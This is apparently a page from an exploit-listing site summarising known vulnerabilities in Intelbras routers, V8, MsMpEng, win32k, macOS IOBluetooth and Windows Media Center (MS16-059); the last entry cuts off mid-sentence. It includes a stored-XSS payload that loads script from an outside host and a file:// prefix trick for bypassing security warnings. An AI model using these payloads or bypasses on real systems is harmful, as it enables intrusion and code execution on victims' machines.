
Explore Vulnerabilities


Explore all Exploits:

XSS persistent on intelbras router with firmware WRN 250

This exploit achieves persistent (stored) XSS on Intelbras routers running firmware WRN 250. The vulnerability is triggered by injecting a malicious script through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. The exploit requires a PHP script on the attacker-controlled host to collect the resulting logs.

V8 Out-of-Bounds Write Exploit

This exploit targets a vulnerability in the V8 JavaScript engine, specifically an out-of-bounds write bug. By manipulating certain arrays and memory layouts, the exploit is able to write to memory locations outside of the intended bounds, potentially leading to arbitrary code execution. The exploit takes advantage of a bug reported in the Chromium bug tracker (https://crbug.com/716044).

Vulnerability in MsMpEng

The MsMpEng service in Windows is remotely accessible without authentication, allowing attackers to exploit vulnerabilities in the service. Its scanning engine, mpengine, can be reached remotely by sending emails, by luring a user to a link, and through other delivery methods. Vulnerabilities in MsMpEng are severe because of the privilege level, accessibility, and ubiquity of the service. The core component responsible for scanning and analysis, mpengine, is a complex attack surface exposed to remote attackers. Its NScript component evaluates JavaScript code, and it does so while running highly privileged and unsandboxed.

win32k!NtGdiGetDIBitsInternal Double-fetch vulnerability

The win32k!NtGdiGetDIBitsInternal system call in Windows contains a double-fetch vulnerability, which can potentially lead to kernel pool memory disclosure or denial of service. The bug arises because the BITMAPINFOHEADER structure, specifically its .biSize field, is read from user memory more than once. By changing the user-controlled 'bmi' buffer between the two reads, an attacker can corrupt memory or cause a denial of service. However, the issue is mostly harmless in practice because other checks in the code path prevent serious consequences.

Use-After-Free Vulnerability in IOBluetoothHCIUserClient

This vulnerability exists in the IOBluetoothHCIUserClient of the IOKit framework in macOS. When creating a new IOBluetoothHCIUserClient, if the userclient doesn't take a reference to the owningTask, an attacker can pass a task port for another task, kill that task, and get the user client to use the freed task struct. This can lead to a use-after-free vulnerability, allowing an attacker to manipulate IOMemoryDescriptors and potentially execute arbitrary code.

Microsoft Windows Media Center .MCL File Processing Remote Code Execution Vulnerability (MS16-059)

Microsoft Windows Media Center (all versions prior to May 11th, 2016) contains a remote code execution vulnerability triggered upon processing specially crafted .MCL files. The vulnerability exists because Windows Media Center does not correctly process paths in the "Run" parameter of the "Application" tag, bypassing the usual security warning displayed when trying to run programs residing on remote (WebDAV/SMB) shares. To bypass the Windows Media Center security warning, an attacker only needs to write the prefix "file://" before the actual remote location, for example: file:///192.168.10.10\share\app.exe.

However, Windows will still display an "Open File" security warning for files placed in remote locations (the IE Internet Security Zone), which can also be bypassed using a special "Control Panel Shortcut" that points to a remote DLL/CPL file. Upon pointing to a shortcut located on a remote share, it is possible to run arbitrary code in the context of the currently logged-on user. Note: on 64-bit Windows, a 64-bit DLL should be provided, but 32-bit DLL files should work as well.

A PoC MCL file is provided, which points to a default Windows share to retrieve a special "Control Panel Shortcut" that runs a CPL file from the same location (\\127.0.0.1\c$\programdata\cpl.lnk). Notice that although the address points to localhost, Windows treats it the same way as any other IP-based location, placing it in the context of the IE "Internet Security Zone" (the default for non-local places). The PoC CPL file only runs "cmd.exe /c calc" for demonstration purposes. Another important note is that after this Micr

Recent Exploits: